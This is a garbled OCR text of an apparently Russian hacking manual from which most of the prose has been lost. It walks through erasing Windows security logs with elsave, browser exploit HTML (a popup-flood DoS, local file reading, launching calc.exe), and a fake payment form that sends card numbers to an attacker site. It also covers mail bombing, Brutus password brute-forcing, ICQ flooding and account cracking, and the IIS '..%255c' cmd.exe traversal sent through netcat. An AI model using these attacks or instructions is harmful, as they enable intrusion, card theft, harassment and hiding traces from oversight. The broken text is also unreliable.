. auditpol.exe - , , ,
, ( auditpol /? ).

Windows 2000/XP :
> (Start)
(Settings Control Panel).
File
Action
View
Help
Event Viewer [Local]

I Type I Description
Application Error Record!
I Sire
512...
Delete all records n the log
Puc. 4.7. Windows

70

(Control Panel)
(Administrative Tools).
(Event Viewer).
Event Viewer ( ) (. 4.7).
(Security Log);
.
Clear all Events ( ). , . 4.8,
.
Do you want lo save "Security" before clearing it?

Yet
No
Cancel
Puc. 4.8.
> (No), . .
,
- ! ,
-
. , elsave.exe (http://www.ibt.ku.dk/jesper/ELSave/default.htm).
, ,
Windows NT 4, Windows 2000.
.
C:\els004>elsave -s \\ComputerName -
-s , -
. , . elsave /? ,
.
, elsave.exe . - elsave.exe
Windows ( (Start), AT
MS-DOS). System, .
71
-
( , - ).
, , . , , ,

, .
- ! 50%
( - !)
- !
- , , [9]. , , Norton Personal Firewall, PGP Desktop Security .
, ,
, .
72
#
, ,
, ,
. , ,
,
, , .
, 90- , .
, , .
, , ,
.
, ,
, TCP/IP.
- ,
.
- , , .
,
.
, , , (, ).
, . ,
, , , Word ..,
, , ,
.
WWW (World Wide Web - ), Web (). Web - ,
Web . -
1961 , Web 1992 .
, , -

. Web - Web ,
, Web.
Web .
Web, Web URL (Uniform
Resource Locator - ),
Web.
,
Web HTTP (Hyper Text Transfer
Protocol - ).
, Web, HTML (Hyper Text Markup Language -
).
, ,
, - HTML CGI HTTP.
Web , , Web, , - , , - 1 Web
.
Web , , Web - HTML Web,
( browser, , , ),
Web Web-.

HTML - Web,
Web,
, , , , , , , , . , HTML
, Web, , Internet Explorer (ffi) Netscape Navigator (NN).
74
Web
: Web - , HTML Web , , ,
HTML, , - Web? -
HTML? . ( )
, , Web-.

, DoS , Web . , ,
Web,
, .
open ( ) ,
JavaScript MainPage.html
, HTML 8. 1.
8.1.
HTML Web-
<HTML>
< SCRIPT LANGUAGE* " JavaScript " >
generation () ;
function generation () {
var d=0;
while (true) {
a = new Date;
d = a.getMilliseconds( ) ;
window. open ("MainPage. html", d, "width=250, height =250") ;
</SCRIPT>
</HTML>

HTML, , . Windows 2000/XP
IE 5 IE 6 HTML,
.
75

IE 5 IE 6
.
tlep
- . , 8.2
... (
).
8.2.
HTML Web-
<HTML>
<SCR1PT language=JAVASCRIPT>
var p = external.... ;
</SCRIPT>
</HTML>
HTML 8.2 IE 5
6 var p 8.2.

( [3], [10]). , ,
-
HTML .

[3] HTML,
<OBJECT> CLSID.
8.3. HTML, .
8.3.
HTML
<HTML>
<OBJECT CLASSID='CLSID:10000000-0000-0000-0000-000000000000'
CODEBASE^': \windows\system32\calc.exe ' >
</OBJECT>
</HTML>
8.3 IE 6 ,
. 5.1.
76
Web
JQ C:\Documenl. and Selling*\Alex4Mj> DocuroenUSWork D... [)11
. 5.1. HTML
C:\Windows\
system32\calc.exe, , .
Web- ,
JavaScript, HTML- Web-, . ,
IFRAME, Web- .
8.4 HTML, ,
C:\security.txt.
8.4.
Web- _
<HTML>
<BODY>
C:\security.txt <BR>
<IFRAME id=Il></IFRAME>
<SCRIPT event=NavigateComplete2(b) for=Il>

alert (" :
\n " +b . document . body . innerText ) ;
</SCRIPT>
<SCRIPT>
77

II.navigate("file://:/Security.txt");
setTimeout('Il.navigate(nfile://C:/Security.txt")',1000);
</SCRIPT>
</BODY>
</HTML>
8.4 IE 5 IE 6 , . 5.2.
File
Edit
View
Favorite*
Tools
Help
QMd.-0-
C:\security.txt
. 5.2,

security.txt -
-
Web-.
,
,
, JavaScript . 5.2. Web-
.

Web-
NavigateComplete2, [3].
Web-caumo&
Web, , , - Web- . ,
Web- ActiveX, .
,
,
, , , , -,
- ..
- , ,
. ,
- .
78
Web
- ,
- Web-,
. ,
,
.
, Web - . , Windows
Web- Microsoft NetBus.
Web-, . Web , . 8.7 HTML, -.
8.7.
HTML
<HTML>
<HEAD>
<1>
Bubliki&Baranki
!!!!!</TITLE>
</HEAD>
<BODY>
<SCRIPT TYPE=ntext/javascript">
function falsify() {
z=window.open("about:Internet-
Bubliki&Baranki
");
z.document.open();
z.document.write
("<11<>
Bubliki&Baranki</TITLExHl>3aKa3
VirtualAir</Hl>
<FORM
ACTION^'http://www.AnyHackerSite.com/cgi/GetCardNumber'
METHOD=post>yKa5KMTe <>< TYPE=text><BR>VKa*oiTe
<><INPUT TYPE=textxBR>yKa*aiTe
KapTO4KH<BR>< INPUT TYPE=textxBR><INPUT
TYPE=checkbox VALUE=OK>H VirtualAir<P> <INPUT
TYPE=submit VALUE=''></PORM>");
z.document.close();
}
</SCRIPT>
<H1 ID="header"> VirtualAir</Hl>
79

Bubliki&Baranki VirtualAir,
! < HREF="javascript:var a;" onclick="falsify()"
onMouseOver="window.status=
'http://www.Bubliki&Baranki.com 1 ;
11
return true;
onMouseOut= "window. status= I i n > ,
</A> Bubliki&Baranki!
</BODY>
</HTML>
8.7 IE 5 , . 5.3.
- http://www.Bubliki&Baranki.corn

Rog&Kopito
.
Web-
Rog&Kopito
Bubliki&Baranki,
Web-
Rog&Kopito .
(, ,

.)
,

Web- Bubliki&Baranki.

Web, . 5.4.
Web-
. 5.4

.
80
VirtualAir
& ;1
VutualAir,
! ,.
Bublild&Baranki!
. 5.3. Web-
Rog&Kopito
File
Edit
View
Favorites
Tools
Help
Address us) aboutlnternet-Mara3KH--BublikilBaranki"
Go
VirtualAir

D VirtualAir
IDons
| My Computei
. 5.4. /-
VirtualAir Bubliki&Baranki
Web
CGI- GetCardNumber,
Web-, Rog&Kopito:
<FOKM ACTION='http://www.AnyHackerSite.com/cgi/GetCardNumber 1
METHOD =post >
-
(Address) ,
,
, , .
IE Address Javascript.
URL HTML IE 6, ; , IE 6 HTML
. !
, ,
Web- - . , ,
, .

, , ,
, Web . .
, , , Web.
,
Web-
. . -, , ,
81

, .
.
, ,
.
- Web-, -
, .
:
. , ,
SSL.
Web-
.
.
, , ,
. .
, . , , ,
, . .
Web - .
,
. , , , , Web . ,
- Web
, , - , , .
, ,
4 IE Netscape, , 5 6 .
, ,
.
82
6.

, ,
, ,
, .

, . , , .
, ,
,
, ,
... , - !
- (, , , 1,
). ,
,
,
! ,
. ? -
-
- .
( Flood - ,
) ( Spam - , . Spam ). (..
), , ,
.
, -

SMTP-. Death & Destruction
Email Bomber ( & ) 4.0,
DnD (http://www.softseek.com/Utilities/VBRUN_Files/).
, . ,
DnD, .
Avalanche - Avalanche
DnD, .
. 6.1 DnD 4.O.
Death and Desliuclion 4.0

File
Clones
Header
Session
Random Lists
Mailing Lilts
Window
Extras
Send bomb to:

Say bomb is from: I
Message Subject: I
_pj
CC:
|7| 0 Randomly Change | EdilL

] 0 Randomly Change | Edit List
Message Body:
| SMTP Spy
jendjombjl | Edil Headers | | Abort | | Clear | | Clone | fy
Help
Email Bombing is rarely damaging

to the target but is always
damaging to smtp hosts. I do NOT
condone mailbombing as it
causes problems for SysAdmins of
servers. I did not make this
program for people to blast away
at each other. PLEASE use it
responsibly, and if you HAVE to
email bomb, then please use the
option to randomly switch servers
in between messages; as it
lightens the loads on the server.
Have fun and don't ruin a good
sysadmins time by flooding his
server!
i-Size of BombIB Randomly Change [ ,Usages to send:

-m I
Edit Server list
JI
1 I O Never ending bomb
20.01.2003.
use the Edit He
Puc. 6.1. DnD

DnD, , 1-1.
, ( ).
.
.
84
DnD Settings
(), DnD (. . 6.1).
DnD Settings ()
:
> SMTP Host ( SMTP) , SMTP-, . SMTP Sword-2000.sword.net.
> Spoof Host ( )
, .
, .
Randomly Change ( ) ,

SMTP-.
>
SMTP-,
Edit Server List ( ). Random
Server List ( ), . 6.2.
^ Random Servei List

orca.esdIH.w | |mw.highway1.c| |intetconnect.ne| lhorizQns.net
stjohns.edu
] Imalasada.lava. | lpressentef.com | |cyberhighway.n|
mail.sisna.com| | why.net
|widQwmaker.co| Iclubmet.mettob |
wwa.com J |nyx1G.cs.du.ed| | clinet.fi

soi.hypeichalcl rdagobert.rz.uni-jl lspace.net
tka.com
ihZOOO.nel
| Iplix.conr
j jcabletegina.co |
J |maple.nis.net
Idubmet.metrob | ltMvl.net
| vitro, com
Puc. 6.2.
SMTP-
SMTP-
Random Server List ( ) .
Submit ().
Size of Bomb ( ) (. 6.1)
:
# of messages to send ( )
.
10.
Never ending bomb ( ) .
85

Check the box and then fill in the information that will appear in the
headers under that category; or uncheck the box to remove it from
the headers.
X-Mailer:
X-URL:
X-Sender:
X-Date:
Q Return Path: [
Q References: |
Priority:
Q X-Authenlication Warning
| Generate IP |
|124.49.153.SO
Ok
[TedGilsdorf
Clear
Cancel
Puc. 6.5. MIME
13
, DnD , . , ,
.
, Clone ()
E-Mail bomb ( ) Bomber Spawn 1 (
), . 6.6.
-a Bomber Spawn 1
Sendbombto:
-1
Say bomb is from:
Randomly Change
Message Subject:
| |
Random
Message Body:
1
SMTP Server:
gl Randomly Change
ya
llnllml| I Edit Headers | | Abort || Clear
j?
[Status
{Messages Sent! |0
Puc. 6.6.
88

, Bomber Spawn 1 ( ) E-Mail bomb ( )
-
SMTP-. ,
SMTP-. - - , !
- .
, , ( - ).
> , DnD Clones Load Multi Clones ( * ). Number of clones (
), . 6.7
Number of clones
How many clones do you want to load?
Puc. 6.7.
- !
> Number of clones ( ) ( 5-6) .
Bomber Spawn
( ), 1 -
. Send Bomb ( )
. -
!
&&
! , - ,
89

! DnD
, , Mailing lists ( ). Subscribe
joe lamer to mailing list ( ),
. 6.8, ,
Euro Queer ( ), Mormons (), Family Medicine
( ) -
!
1=1
*i Subscribe joe lamei to a mailing list!
Subscribe your enemy to a mailing list even worse then a mailbomb!

More lists coming next version..sorry lor the small quantity (his lime.
My apologies for the bad usability but I will use checkboxes instead of option boxes
next version..
Jewish List
CMd Parenting
Targets email address:
Digital Queers Gay Quakers
Targets fits! name:
|j0hn
Mormons
Christianity
Targets last name:
Gay/Lesbian
womanism
Euro Queer
people
Lesbians over 40
Bi Australians
Family Medecine
Allergies
Puc. 6.8. DnD

DnD
. Target
Email Address ( ), Subscribe em
() - . , .

,
, DnD , ,
, . ,
Extras Pword generator ( * ).
Randomic Password Generator ( ), . 6.9.
, How many characters? (
?) ( - 8 )
: Use Both ( ) - , Use numbers ( ) - 90

Use
letters ( ) - . - , ,

.
* Randomic Passwoid Geneialor
Jusl click to generate a random password. Choose how long

you want it to be by the number ol characters.
How many characters? [12 |
Use Both
Use numbers Use letters
6i2i9e1m5p8i
Close
Clear box
Extras ()
- . 6.9.
SMTP- (
SMTP Remote ( SMTP)),
( Raw Port ( )).
, ( , SMTP). Other Tools
( ) . - , ,
.
, - ;
. ,
, . , ( ). , .

. , ,
- (
IMAP) , .
- .
Brutus Authentication Engine Test 2
( Brutas , 2),
Brutus AET2 (http://www.hobie.net/brutus). . 6.10
Brutus,
, FTP, HTTP, Telnet
NetBus.
91
I Biulus AET2 - www.hoobie.net/biutu: - (January 2000)

lie
Tools
Target
(SisJEI
Help
|127.0.0.1
Ti"pe|POP3
|~| | Start
| Stop [Clear
Port (110
Connections 10 Timeout ^} 10
Use Proxy | Drf |
|B'?S..?.^.P.9.?.l| D Try to stay connected for [Unlimite |

^
| attempts
0 Use Username
Single Usef
User File | users.txt
Pass Mode [Word List "p|

| | Browse |
pass pje jwords.txt
| | Browse |
Positive Authentication Results

Target
I Type
5J
II
I Username
|
II
I Password
R*cl
AuthSeq
Throttle Quick Ki
ll>dle
Puc. 6.10. Brutus
,
Brutus ( 8
Brutus IIS). , alex-1 .sword.net,
kolia. , ,
- ,
.
.
> Brutus - 2 (. 6.10) Target () , alex-1.sword.net.
> () ,
.
> Connection Options ( ) Use Proxy ( ),
-
.
> Authentication Options ( ) Single User ( ) -
.
92

User file ( ) , .. - kolia.
> Pass Mode ( ) Brute Force
( ). Brutus ,
. 6.11.
X Biutus - 2 - www.hoobie.net/biuluit - (January 2000J

File
Tool.
Target
Help
|alex-1.sword.net
[T| | Start | Slop | Clear |
Type|POP3
nnection Optioru
>orl [110
I 10
I 10 Timeout
Connections
Use Proxy I Define!
IPS Options-
| Modify sequence |
Try to slay connected for |Untmil8 |-r | attempts
-Authentication Options
0 UseUsemame
UserlD
Pass Mode [Brute Force|--1 |[Kange|| | Dfellfcuted |
0 Single User
| kolia

I Type
Target
I Username
| Password
Rtet
AuthStq
Throttle Quick Kil
Puc. 6.11. Brutus POPS

Range
(). Range () Brutus - Brute
Force Generation (Brutus - ), . 6.12.
Biutus - Biule Foice Generation
Digits only
Min Length [
Lowercase Alpha
Max Length [4 [T
Uppercase Alpha
Mixed Alpha
Cancel
Alphanumeric
Full Keyspace
Custom Range |etaoinsrhldcumfpgwybvkxjqzl 234567890! |
Puc. 6.12.
93

Brutus - Brute Force Generation (Brutus -
) - ,
, . ,
- , Min Length ( ) 3, Max Length ( ) - 4. , Digits only
( ).
.
> Start () Brutus - 2
Brutus - 2. . 6.13.
1=1
X Uiutus - 2 - www.hoobie.net/biutus - [Januaiy 2000J

File
Took
Help
Target | alex-1.sword.net
EJ | Start | Stop | Clear |
Type|POP3
i-Connection Option*
I
Port [110
Connections
10
10 Timeout
rPOlP3 Options| Modify sequence |
I?
D Try to stay connected for |Unlimite | > | attempts
-Authentication Options
El Use Username
UserlD
Pass Mode [Brute Force [
0 Single User
I Range
DisllbAed
[kolia

Target
alex-1.sword.net
I Type
POP3
| Username
kolia
I Password
0007
Positive authentication at alex-1 .sword.net with User : kolia Password : 0007 (1 0997 attempts
Timeout
10997
Uikolia P:0000
~]|37 Attempts per second
Reject
Throttle
Quick
|Idle
Puc. 6.13. 1.
Positive Authentication Results (
) , kolia - 0007.
, Brutus 10997 alex-1.sword.net (
11000). 5 Pentium 3
1000 ,
Ethernet 10 /.
,
, Brutus (
94

). -, , , ( 8 !),
, (, &$ ..).
!
Brutus - Brute Force Generation (Brutus - ) 8 ,
Full Keyspace ( ). Start
() Brutus - 2
- 6 095 689 385 410 816 - , !
12 ?
, , ,
(., , [10]). Brutus,
Pass
Mode ( ).
( 100 000), ,
. , password, parol, MyPassword
- Web- -
.
-,
,
, Ethernet, 30-50 / (
). -
. -
, - , ,
,
.

. , , , ,
, . .

- , .
95

IIS Brutus 8 , - . ,
, . , , ,
- , -
! :
!. .

, , ,
. 1, , , , . - ,
, , ,
. ,
- ( - ),
.
, - ,
. . ,
TFTP 1-1 , 1-1 . , TFTP
, .
TFTP
, ,
, . , , , ,
,
.

. , ,
96

( ) . ,
, , Web- - .. ( ,
). . - , , , -.
. - , ..
,
- , ,
. , ..
, -
-
. , 2002 ., , ,
.
Web-. . . ...
(
). Web-, ,
?, .
, , ?, ?,
? . -
, ,
, ,
. , , , , ,
. ,
, - ,
,
repa_parenaia, - !
- . , , ,
,
. 97
4 - 5830

- , , ,
- , . .
, - .
,

. , (
) , -
!
.
,
8 ( 12) , , .
,
DnD .
.
, - , Norton Antivirus
MacAfee VirusScan.
,
- PGP Desktop Security.
, .
, - , ,
, .

- - , .
98
7.
ICQ
ICQ Intelligent Call Query, .
ICQ [--] : I Seek You - ; ,
ICQ . ICQ
,
1998 Mirabilis,
( 40 ) AOL.
ICQ ,
ICQ ,
, . , , ICQ,
,
. , , - .
ICQ ,
ICQ.
ICQ , ICQ, ,
http://www.ICQ.com, http://mira-bilis.com. ICQ - ICQ , , 1998,1999, 2000,
2002, ICQ 2003. ICQ
UDP, 4000, -
TCP, .
, ICQ, UIN (Unique Identification Number -
). UTN -
ICQ , .
, ICQ?
ICQ ,

. , ? .
-,
ICQ,
. -, ICQ ICQ
.
, ICQ, :
, UIN ,
, . , ICQ , - ICQ . , , - .
ICQ-, , IP-
ICQ-, , . , , DoS, 9 . ,
IP- ICQ, -
, ICQ- .
!
, ICQ-,
. ,
,
, - ,
.
ICQ,
Mirabilis
. ICQ, ICQ , .
,
.
100
ICQ

ICQ
. - ,
ICQ
ICQ ICQ. ,
ICQ ; , ICQ- (,
LameToy
www.mirabilis.com). , ( )
,
.
,
, ,
, ,
.

, ICQ. .
. Sword-2000
ICQ Groupware Server, Alex-
ICQ Groupware Client, UESf, 1001, 1-1 ,
UIN, 1003. ICQ Groupware
http://www.icq.com.
ICQ, ICQ
Groupware, ,
, 1. - , ICQ - ,
ICQ
. ICQ
ICQ-,
ICQ-, ICQ- .
101
UIN ICQ- UIN ICQ, , UIN . UIN

. ,
, - .
- - , .
, , .
( ) LameToy for ICQ
(DBKILLER), , , ( http://icq.cracks.ru/attack.shtml). LameToy for ICQ , , .
LameToy for ICQ.
. 7.1 , LameToy for ICQ.
LameToy For Icq [DBKILLER]
| Send [
Selling-
Losei-
LLMZ.
Slop | | Update; | Menu | | Hide [f Exit
JQ044J
Pott Scarmei- |
[Normal Message M
-UlNSniffer-
1.
I Get Local IP 11501
Sendei
miNBIiOOl
IPasswdL
l|URL|hHp:/V
Messsage
Puc. 7.1. LameToy for ICQ (DBKILLER)

ICQ

LameToy for ICQ (DBKILLER) -
Send (). , Setting
() Loop () ,
. UIN,
UIN# - Ran (Random - 102
ICQ
). ,
, , , .
, ICQ-,
- , UIN UIN
. , ICQ (ICQ99a
ICQ99b) . DB-
( - ), DB Data Base - , ,
DB NewDB. LameToy ,
DB killer ( DB)
Setting ().
ICQ, .
, , LameToy, UIN , , , System Messenger - ICQ Team (http://www.icqinfo.ru/softjcqteam.shtml), ICQ Sucker
.
lf~ac)peca ICQ-
DoS ( ) ,
- . ,
, , Advanced ICQ IP
Sniffer - ICQ Team ( Web, , http://www.icqinfo.ru/sofl_icqteam.shtml).
. 7.2 Advanced ICQ IP Sniffer.
a a a'
Advanced ICQ IP Sniffer

Your UIN: [207685174
| Password: IJ
UIN to check: |123456783
Clear list
Cheek
Saver
Timeout. Tiy again.
Ext IP: |
Status: |
|TCPFIa9: |
IntIP: |
TCP Pott: |0
| TCP Version: |0
Puc. 7.2. - IP- ICQ
103

IP- ICQ UIN, Advanced ICQ IP
Sniffer ICQ, UIN . , , Your UIN ( UIN) Password
() Advanced ICQ IP Sniffer (
ICQ). Check ()
, ICQ
UTN , Info
() .
, Info () . 7.2
, ( ) IP- ICQ,
TCP-, ICQ . , , Ext IP ( ), Int
IP ( IP) TCP Port ( TCP). ,
ICQ- ( ).
ICQ, Advanced IP ICQ Sniffer,
ICQ server's address and port (
ICQ), Server () . 7.3.
ICQ server's address and port

Address: licq.rnirdbilis.com
Port:
[4000
| |
OK
Cancel
. 7..
ICQ server's address and port
( ICQ)
ICQ server's address and port ( ICQ)

Mirabilis ICQ 4000. , / IP- / .
ICQ, , , ICQ-,

ICQ- ICQ. ,
,
.
, ICQ, ICQ-MultiWar
(http://www.paybackproductions.com/), - ICQ Flooder
(. 7.4).
104
ICQ
ICQ Flooder
File
Victim's address: 127.0.0.1
ICQ Port [1027
El Randomly generated UIN

Appatenl source UIN: Q
No. ol Messages: |1
Message:
Eat this!
ICO Flooder 1.2 Copyright (C) 1998 dph-man and Implant Man
Puc. 7.4. ICQ

ICQ Flooder, .
> Victim's address ( ) IP-
ICQ.
> ICQ-port ( ICQ) TCP.
> , UIN .
:
UTN - Randomly generated UIN
( UIN), UIN UIN.
UIN - Apparent source UIN
( UIN ) UIN, ICQ .
> No. of Messages ( ) ICQ-.
> Message () (- , ).
> Send! () .
- , ICQ, , - , ,
105

http://mht.hut.ru/icq/icq.html,
( , , ICQ , ). ICQ - ,
, , -
!
ICQ
ICQ,
ICQ, ,
. ,
, .
, , ICQ subMachineGun v1.4 (http://icq.cracks.ru/best.shtml), . 7.5.
OICO SubMachineGun vl.4 by uD
File Settings About
[ Bruteforce ]
About
[... [ 13 Single
[~~] Single
Agent
Force!
||(c) uD . Moscow 2QO1
Puc. 7.5. ICQ subMachineGun

U1N ICQ
106
ICQ
brute
force - , ,
.

.
ICQ ICQ subMachineGun
.
>
ICQ subMachineGun.
> Settings * Connections&Cracking (&). , . 7.6.

icq server
port
[ Cracking ]
13 Stop if successful...
Make log of cracked uins
0 Reconnect if timeout
0 Cut passwds length to 8 digits
set timeout:
relogln ;
times
Cancel
OK
Puc. 7.6. U1N

icq server ( ICQ) ICQ,
, ICQLmirabilis.server.
port () 4000.
Cracking ()
:
Stop if successful ( )
ICQ.
Make log if cracked uins ( UIN) ICQ.
107

Reconnect if timeout (
) ICQ
.
Cut password length to 8 digits (
8- ) 8- .
> set timeout ( ) 15 .
> relogin ( ) ICQ
3.
ICQ subMachineGun
UIN . .
> ICQ subMachineGun Bruteforce
( ) UIN. .
Single
() UIN,
.
Single
() UIN.
UIN,
(...) Making victims list ( ), . 7.7.
Making victims list (
) Range () ,
, UIN ( - 100000)
( 900900).
I Hint: use Del to remove uins from list
Puc. 7.7.
UIN
step () UIN ( - 100).

Generate () UIN;
.
108
ICQ
, Generate ()
- UIN, , , ..
Add () UIN .
> UIN,
Open () UIN ( UIN ).
> - UIN ,
t0*"!. Clear () UIN ( ).
UIN, .
.
> ICQ subMachineGun Bruteforce ( )
. .
Single () , .
Single () .
> ,
(...) Make passlist
( ),
. 7.8.
Make passlist ( )

.
> Open () (
).
- ,
ICQ.
Use Del to remove passwords from list
Puc. 7.8.

v Generator ()
Add (). , .
109

> , 0
*"**]. Clear ()
( ).
> , .
.
Force (). , ICQ
subMachineGun v1.4 (. 7.9).
OICQ SubMachineGun vl 4 by uD
File Settings About
[ Bruteforce ]
About
[] 0 Single
[~~] D Single
Agent
Puc. 7.9. -

ICQ subMachineGun v1.4,
UIN, ( , . 7.9 ). ,
, 15 ,
ICQ.
- 45 ,
( ). ,
, , , , .. - .
...
110
ICQ
(
-, , ICQ -
. ICQ , ICQ . ,
? - ! ,
? ,
ICQ- , .
,
.
? ,
Windows.

, . ,
ICQ ,
ICQ.
ICQ-, ,
ElcomSoft Advanced ICQ Password Recovery
(http://www.elcomsoft.com).
, .
. 7.10 Advanced ICQ Password
Recovery.
31.01.2003 2:05 - ACQPR1.0 launched, registered version
6.COPR 1.0 (cl 2000 Plea Goriunov and Andy Malvshev. ElcomSofl Co. L
Puc. 7.10. ICQ .dat

ICQ, Advanced ICQ Password Recovery (
ICQ) .dat, ICQ.
111

, , ICQ
2002 2002.
2002 , UIN .dat,
.., , 207685174.dat
(207685174 - UIN ).
ICQ Password successfully found! ( ICQ ), (. 7.11).
ICQ Password successfully found !

ICQ version:
99b-2000b
UIN password:
% Copy to Clipboard
fij Close
Puc. 7.11.
!
. 7.11,
ICQ 99b - 2000b, ICQ 2002 ( ).
, ICQ
, - , - ICQ-. - , , (. [11]), Web- (. 8). ,
, ,
.

, ICQ
( ) , . , ,
,
ICQ. , ,
ICQ - ,
- . , .
ICQ,
.
. , , ICQ- - ICQ . ,
ICQ , UIN . -
112
ICQ

?
, , , - ,
. , , - , , , ,
, , - . ICQ - , , ,
,
, , , , .
- ,
.. ICQ, , ,
. ,
ICQ ICQ,
ICQ (
, ICQ Team
(http://www.lcqteam.com)). ICQ- ICQ, ICQ- - ICQ.

- , .
, ? ,
, . ,
- , ? , ... ,
, , .
ICQ-, -

,
.
ICQ , . ICQ - ,

113

ICQ-.
ICQ DoS ...
.
ICQ
. -, ,
ICQ-, ICQ-, ICQ- .
ICQ,

ICQ. IP- , ,
ICQ. ICQ .
, ICQ-, UTN
. , ICQ-, -, , BlacklCE Defender,
DoS. -
, , .
,
. ,
ICQ -
.
-, -
ICQ, ICQ. , IP- ICQ-,
- . ,
.
, . ICQ , PGP Desktop Security 2.9,
ICQ-
. ,

PGP- ( [7]).
114
8.
Web-caumoft
Web? , Web
,
. Web-
, Web- .
, , , .
, Web-
, ,
, , .
HTML Web-
( - ),
, . HTML
.

(
).
, Web-, , Web-,
, . HTTP, , , .
Web-,
, .
, Web-, DoS
,
, Yahoo.
,
Web-, , ( ) Web- ,
. Web , .
Web~cauma
Web
Web , , Web, Web,

, .
Web - Web, Web . Web - , Web, Web . Web

, .
Web - Web,
, Internet Explorer (ffi), -
HTML Web-, HTTP,
Web.
Web , IIS Microsoft, Apache HTTP Server Apache Software Foundation
. Web,
ASP (Active Server Page - ) CGI,
, Java SUN,
Apache Software Foundation .
Web, Web,
, . SQL Microsoft, Oracle Oracle .
, , , -
ODBC (Open Data Base Connectivity -
).
- , , , , , ... ?
1 Web~cauma
,
Web-,
. ,
.
116
Web-
Web- - ,
, , , , Web .
Web- - Web- ,
, TCP- 80, , Web-,
( CVE, Web-), Web- - .
Web - - ASP, Java, CGI -
, .
Web - , -,
, -, ( !).
, , - . , , (cookie),
, .
- Web-
, , . , , CGI- , -
CGI- , , , .
- ,
Web- , .
- , Web-
, ,
, -
.
- , , ,
Web-, Web-, .
, (, . []).
, , , , IIS 5. ,
117

(
HTTP), CGI- (
) Web
( Web).

Web- , .
IIS , Web-,
. , Web- ,
- , .
- , Web-. - . , FTP- , , .
, .
Web- .
Web~cauma
,
Web-,
. , , ,
, . , , .
, Web- , - , , DNS-,
.
Web.
,
.
118
Web-
cbp
Web-
.
.
-, ,
- ,
. IP-, , ,
.
Whols .
-, HTML- Web- . HTML , Web, , .
, , , , JavaScript . , HTML- Web
Web- Teleport Pro.
, , Whols - , ,
Web.
whois (
Unix), Web- , whois Web-.
Whols
. , ,
. 1999
- Network Solution (http://www.networksolution.com),
, , InterNic (http://www.internic.net). / .
Web-,
Whois ( ),
. Whois
, ,
119

, DNS
. ,
RIPE NCC (Network Coordinate Center - ),
IP-
. Web- RIPE NCC (http://www.ripe.net),
. 8.1.
<* $ -V gjj [JQ J j i^ ^ j ^j* 4>t @ T 1
Aqp9c|fehltp://www.ripB.net/npen^ûb^^c^^
El ^ |
. 8.1. Web- RIPE NCC

IP- Web-
? - -
DNS - .

,
SuperScan (http://www.foundstone.com),
. 8.2.
SuperScan, .
> Start () - .
> Stop () .
> Scan type ( )
All list ports from ( ).
> Start ().
120
Web-
Timeout
StarlfTMT
Stop|l.0.0.5
0 Ignore IP zero
0 Ignore IP 255
Extract from He
P'ng
|400
Resolve hoslnames
121 Only scan responsive pings
[3 Show host responses
Conned
Ping only
|2000 |
Every port in lisl
5 EZB
All selected ports in list

Read
14000 I
(5 All list poets from

All ports from
. 8.2.

SuperScan . , IP- 1.0.0.1 HTTP IIS 5.0, - Web. (
),
.
6 shares found on 1 remote hosts.
wa-
M.0.0.1SMy Documents
M.O.(mNETLOGON
M.0.0.1\D
M.0.0.1\Tesl
. Downloads
M.0.0.1\SYSVOL
1.0.0,1
My Documents
NETLOGON
D
Tesl
My Downloads
SYSVOL
Map Drive
. 8.. IIS 5
121

Legion (http://packetstormsecurity.org/
groups/rhinoS),
- 1.0.0.1 . 8.3.
, - IIS 5,
- , ? .
| II5
IIS ,
HTTP (Hypertext Transfer Protocol - ) CGI (Common Gateway Interface - ), IIS, .
HTTP , , [12], - Web . HTTP ,
GET. Web-
(, ),
GET,
,
,
http://www.anyserver.com/documents/order.html.
order.html /documents IIS,
c:\inetpub\wwwroot\documents.
CGI , , [12],
.
HTTP, :
http://www.anysite.com/scripts/MyScript?napaMeTp1+napaMeTp2
MyScript - , /scripts IIS, a
?1+2 ,
MyScript. IIS ,
, ,
.
CGI, ASP
(Active Server Pages - ) ISAPI (Internet Server
Programming Interface - ). ASP :
http://www.anysite.com/scripts/MyScripts7napaMeTp1 =1&2=
2
122
Web-
MyScript.asp, , , HTML. ISAPI
, ISAPI. HTTP:
http://www.anysite.com/isapi.111?1&2
, IIS, , .
HTTP ,
IIS . IIS 2.0 :
http://www.anysite.eom/.7.7.7.7.7winnt/secret.file
Web- , secret.txt.
- Windows, ACL.
IIS , Web-
[3]. IIS
, , , , ,
SecurityLab.ru (http://www.securitylab.ru).
IIS,
netcat (http://www.atstake.com), (netcat - - [3] netcat IIS).
netcat Sword-2000
,
. netcat .
> Alex- netcat,
nc -vv 1.0.0.1 80.
v
GET / HTTP/ 1.0 111. . 8.4.
GET / HTTP/1.0
IIS. . 8.4, HTML,
.
123

ic-MCommand Piompl
c:\test\netcat>nc -vv 1.0.0.1 80
fud/reu nisnatch: SUORD-20UO !=

| DNS
SUORD-2000 tl.0.0.1] 80 <http> open
GET
HTTP
suord-2000.suoi-d.net
/1.0
HTTP/1.1 400 Bad Request
Seruer: M i c r o s o f t - I I S / S . 0
Date: Fri, 28 Feb 2003 12:55:40 GHI
Content-Type: t e x t / h t n l
Content-Length: 87
<>itml><}iead><title>Error</titleX/head><body>The parameter
</htnl>sent 17, rcud 224: NOISOCK
C:\test4netcat>
Puc. 8.4. GET IIS netcat

, GET <.
GET.txt :
GET/HTTP:/1.0
[CRLF]
[CRLF]
[CRLF] . netcat .
nc -vv 1.0.0.1 80 < get.txt

get.txt, . 8.4.
( .)
, . ddcode.txt .
GET /scripts/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ HTTP /1.0
[CRLF]
[CRLF]
1-1 Windows
2000 ( ).
netcat :
nc -vv 1.0.0.7 80 < ddcode.txt
. 8.5.
124
Web-
: Command Piompt
- . 8 . 7 88 < a d c o d e . t x t
a t c l . : flLEX-1 = ftLEX-1. suoi'a. n
IftLEX-l E l . e . B . 7 ] 88 O i t t p > open
I H T T P X 1 . 1 289 OK
ISevvev: H i c v o s o f t - I I S X 5 . 8
( D a t e : S a t , 81 Mar 2883 8 7 : 1 6 : 4 2 GMT
.
. : C81B-81F8
86.12.2882
22.12.2882
13.81.2883
86.81.2883
86.81.2883
87.82.2883
28.81.2883
86.82.2883
18:37
<DIR>

8
132348275
> 713: NOTSOCK
|C:Xtest\netcat>
. 8.5. 1-1 !
, 1-1
! Sword-2000 ( Windows 2000 Advanced
Server Service Pack 2) - Microsoft ,
2000 . ,
URL ,
(. [3], [4], [11]).
, Windows 2000 ?
- ,
? ,
.

Web-, IIS, -
, Web-.
, Web- CGI (Common Gateway Interface - ), , Web .
CGI, , .
Web-,
.., IIS, System, . .
125

, CGI- , , . , -
, ,
,

. , - .
, , Perl, , ., , , ,
